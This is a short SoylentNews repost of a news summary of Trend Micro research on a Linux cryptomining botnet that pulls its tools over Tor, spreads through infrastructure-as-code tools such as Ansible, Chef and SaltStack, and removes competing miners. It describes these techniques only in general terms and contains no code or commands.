Tor-Based Linux Botnet Abuses IaC Tools to Spread
upstart writes in with an IRC submission:
Tor-Based Linux Botnet Abuses IaC Tools to Spread:
A recently observed malware botnet targeting Linux systems is employing many of the emerging techniques among cyber-criminals, such as the use of Tor proxies, legitimate DevOps tools, and the removal of competing malware, according to new research from anti-malware vendor Trend Micro.
The researchers say the malware is capable of downloading all of the files it needs from the Tor anonymity network, including post-infection scripts and legitimate, essential binaries that might be missing from the environment, such as ss, ps, and curl.
With the help of these tools, the malware can make HTTP requests, gather information about the infected system, and even run processes.
To perpetrate the attacks, the threat actor behind the botnet maintains a big network of proxies to maintain connections between the surface web and the Tor network.
[...] The observed malware sample can remove certain cloud-related services and agents and abuse infrastructure-as-code (IaC) tools such as Ansible, Chef, and SaltStack, to spread to other systems.
At the moment, the botnet deploys the XMRig Monero (XMR) miner onto the infected machines. The crypto-miner uses its own mining pool and the malware searches the system for other running miners and attempts to remove them.
[N.B. - Emphasis retained from the original]
Read more of this story at SoylentNews.